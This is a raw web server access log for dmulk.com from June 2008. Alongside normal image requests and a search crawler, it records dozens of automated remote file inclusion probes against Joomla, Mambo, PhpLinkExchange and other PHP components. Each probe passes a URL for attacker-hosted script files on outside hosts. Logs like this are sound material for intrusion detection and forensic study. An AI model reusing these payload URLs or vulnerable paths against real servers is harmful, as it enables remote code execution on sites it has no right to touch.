64.15.129.23 - - [09/Jun/2008:11:23:21 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://o-x-r-a-n-a.ru/forum/language/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
64.15.129.23 - - [09/Jun/2008:11:23:23 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://o-x-r-a-n-a.ru/forum/language/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:23:25 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0089.jpg HTTP/1.1" 200 496294 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:23:38 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0034.jpg HTTP/1.1" 200 278838 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
65.55.211.28 - - [09/Jun/2008:11:23:45 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.28 - - [09/Jun/2008:11:23:45 -0700] "GET /mobileoffice/?M=A HTTP/1.1" 200 5024 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
72.47.201.117 - - [09/Jun/2008:11:23:47 -0700] "GET //errors.php?error=http://sobangnara.com/board/data/.init/est.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
72.47.201.117 - - [09/Jun/2008:11:23:47 -0700] "GET /logs//errors.php?error=http://sobangnara.com/board/data/.init/est.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
168.209.97.34 - - [09/Jun/2008:11:23:48 -0700] "GET /logs//errors.php?error=http://www.geocities.com/vianarina/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
168.209.97.34 - - [09/Jun/2008:11:23:48 -0700] "GET //errors.php?error=http://www.geocities.com/vianarina/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
206.221.179.200 - - [09/Jun/2008:11:23:49 -0700] "GET /poll/comments.php?id=http://supervisa.com.mx/up.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
206.221.179.200 - - [09/Jun/2008:11:23:49 -0700] "GET /logs/poll/comments.php?id=http://supervisa.com.mx/up.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:23:52 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0115.jpg HTTP/1.1" 200 439089 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
211.189.26.170 - - [09/Jun/2008:11:23:53 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:11:23:53 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:11:23:53 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.170.173 - - [09/Jun/2008:11:23:53 -0700] "GET /logs/access_080117.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.170.173 - - [09/Jun/2008:11:23:53 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.170.173 - - [09/Jun/2008:11:23:53 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.170.173 - - [09/Jun/2008:11:24:06 -0700] "GET /logs/access_080308.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:24:06 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0090.jpg HTTP/1.1" 200 552807 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
203.130.242.48 - - [09/Jun/2008:11:24:11 -0700] "GET /logs/access_080312.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.132.4 - - [09/Jun/2008:11:24:12 -0700] "GET /logs/access_071226.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://oasislingerie.ca/components/com_virtuemart/shop_image/blank.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:24:19 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0121.jpg HTTP/1.1" 200 373247 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:24:33 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0086.jpg HTTP/1.1" 200 531628 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
211.189.26.170 - - [09/Jun/2008:11:24:35 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:11:24:35 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:11:24:36 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:24:46 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0106.jpg HTTP/1.1" 200 331757 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:25:00 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0048.jpg HTTP/1.1" 200 344028 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
213.203.222.50 - - [09/Jun/2008:11:25:02 -0700] "GET /logs/access_080312.log/index.php?xx=http://nmbsquad.freehostia.com//b1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.222.50 - - [09/Jun/2008:11:25:10 -0700] "GET /logs/index.php?xx=http://nmbsquad.freehostia.com//b1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.222.50 - - [09/Jun/2008:11:25:11 -0700] "GET /index.php?xx=http://nmbsquad.freehostia.com//b1.txt??? HTTP/1.1" 200 16833 "-" "libwww-perl/5.805" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:25:13 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0107.jpg HTTP/1.1" 200 359534 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
88.84.132.4 - - [09/Jun/2008:11:25:17 -0700] "GET /logs/access_080221.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://oasislingerie.ca/components/com_virtuemart/shop_image/blank.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
124.136.39.87 - - [09/Jun/2008:11:25:24 -0700] "GET //MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.tripiwarez.eu/script/blid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.126.254.80 - - [09/Jun/2008:11:25:24 -0700] "GET //errors.php?error=http://www.emilylamont.com/mambots/editors/tinymce/scripts/tinymce/php??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
209.126.254.80 - - [09/Jun/2008:11:25:25 -0700] "GET /logs//errors.php?error=http://www.emilylamont.com/mambots/editors/tinymce/scripts/tinymce/php??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:25:26 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0017.jpg HTTP/1.1" 200 318809 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
124.136.39.87 - - [09/Jun/2008:11:25:30 -0700] "GET //MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.tripiwarez.eu/script/blid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:25:40 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0051.jpg HTTP/1.1" 200 433086 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
216.6.235.230 - - [09/Jun/2008:11:25:49 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.6.235.230 - - [09/Jun/2008:11:25:49 -0700] "GET /logs/access_080228.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.6.235.230 - - [09/Jun/2008:11:25:49 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:25:54 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0013.jpg HTTP/1.1" 200 552361 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
217.75.193.70 - - [09/Jun/2008:11:25:58 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.75.193.70 - - [09/Jun/2008:11:25:59 -0700] "GET /modules/My_eGallery/index.php?basepath=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.75.193.70 - - [09/Jun/2008:11:25:59 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.215.56 - - [09/Jun/2008:11:26:06 -0700] "GET /logs/config.php?path_to_root=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.215.56 - - [09/Jun/2008:11:26:07 -0700] "GET /config.php?path_to_root=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:26:08 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0122.jpg HTTP/1.1" 200 508109 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
212.203.9.46 - - [09/Jun/2008:11:26:11 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://powderpuffsquad.com/admin/backups/.de/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.203.9.46 - - [09/Jun/2008:11:26:12 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://powderpuffsquad.com/admin/backups/.de/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.188.172.6 - - [09/Jun/2008:11:26:15 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.188.172.6 - - [09/Jun/2008:11:26:15 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.188.172.6 - - [09/Jun/2008:11:26:15 -0700] "GET /logs/access_080228.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.184.14 - - [09/Jun/2008:11:26:20 -0700] "GET /logs/access_080312.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.ffshrine.org/iplog???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.184.14 - - [09/Jun/2008:11:26:20 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.ffshrine.org/iplog???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.184.14 - - [09/Jun/2008:11:26:20 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.ffshrine.org/iplog???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:26:21 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0082.jpg HTTP/1.1" 200 299363 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
218.149.85.18 - - [09/Jun/2008:11:26:21 -0700] "GET /logs/access_080109.log/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.149.85.18 - - [09/Jun/2008:11:26:22 -0700] "GET /logs/access_080109.log/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.149.85.18 - - [09/Jun/2008:11:26:22 -0700] "GET /administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.149.85.18 - - [09/Jun/2008:11:26:22 -0700] "GET /administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.149.85.18 - - [09/Jun/2008:11:26:22 -0700] "GET /logs/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.149.85.18 - - [09/Jun/2008:11:26:22 -0700] "GET /logs/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.172.182.209 - - [09/Jun/2008:11:26:30 -0700] "GET /logs/access_080312.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.team-nds.de/includes/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.172.182.209 - - [09/Jun/2008:11:26:30 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.team-nds.de/includes/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.172.182.209 - - [09/Jun/2008:11:26:31 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.team-nds.de/includes/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:26:35 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0094.jpg HTTP/1.1" 200 514980 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
84.19.184.14 - - [09/Jun/2008:11:26:40 -0700] "GET /logs/access_080228.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.ffshrine.org/iplog???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.65.79 - - [09/Jun/2008:11:26:47 -0700] "GET /config.php?path_to_root=http://www.immo-marrakech.com/files/contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
212.227.65.79 - - [09/Jun/2008:11:26:47 -0700] "GET /logs/config.php?path_to_root=http://www.immo-marrakech.com/files/contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
67.19.130.218 - - [09/Jun/2008:11:26:49 -0700] "GET /logs/access_080228.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:26:49 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0011.jpg HTTP/1.1" 200 578661 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
67.19.130.218 - - [09/Jun/2008:11:26:50 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.130.218 - - [09/Jun/2008:11:26:50 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.6.235.230 - - [09/Jun/2008:11:26:53 -0700] "GET /logs/access_080309.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.181.74 - - [09/Jun/2008:11:26:55 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.181.74 - - [09/Jun/2008:11:26:55 -0700] "GET /logs/access_080228.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.181.74 - - [09/Jun/2008:11:26:55 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.172.182.209 - - [09/Jun/2008:11:26:57 -0700] "GET /logs/access_080228.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.team-nds.de/includes/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.92.85.12 - - [09/Jun/2008:11:27:03 -0700] "GET /site.php?page=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
77.92.85.12 - - [09/Jun/2008:11:27:03 -0700] "GET /logs/site.php?page=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:27:03 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0131.jpg HTTP/1.1" 200 515079 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:27:17 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0081.jpg HTTP/1.1" 200 296430 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
213.188.172.6 - - [09/Jun/2008:11:27:19 -0700] "GET /logs/access_080309.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:27:30 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0012.jpg HTTP/1.1" 200 557735 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
207.58.181.74 - - [09/Jun/2008:11:27:37 -0700] "GET /logs/access_080309.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:27:44 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0020.jpg HTTP/1.1" 200 361318 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
85.234.133.173 - - [09/Jun/2008:11:27:50 -0700] "GET /logs/access_080403.log/scanhttp://nozyk.org/rob.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [09/Jun/2008:11:27:50 -0700] "GET /scanhttp://nozyk.org/rob.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [09/Jun/2008:11:27:51 -0700] "GET /logs/scanhttp://nozyk.org/rob.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:27:58 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0062.jpg HTTP/1.1" 200 470360 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
207.58.164.77 - - [09/Jun/2008:11:28:06 -0700] "GET /logs/access.log//component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.164.77 - - [09/Jun/2008:11:28:06 -0700] "GET //component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.164.77 - - [09/Jun/2008:11:28:06 -0700] "GET /logs//component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:28:13 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0004.jpg HTTP/1.1" 200 512676 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
80.154.38.121 - - [09/Jun/2008:11:28:24 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://mfe-gay.de/cek.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:28:26 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0103.jpg HTTP/1.1" 200 432789 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
88.84.132.4 - - [09/Jun/2008:11:28:28 -0700] "GET /logs/access_080312.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://oasislingerie.ca/components/com_virtuemart/shop_image/blank.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.251.172 - - [09/Jun/2008:11:28:30 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:28:40 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0026.jpg HTTP/1.1" 200 518960 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
85.114.130.19 - - [09/Jun/2008:11:28:50 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:28:54 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0064.jpg HTTP/1.1" 200 435434 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
85.114.130.19 - - [09/Jun/2008:11:28:56 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.251.172 - - [09/Jun/2008:11:28:56 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.2.228.10 - - [09/Jun/2008:11:28:58 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://powderpuffsquad.com/admin/backups/.de/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
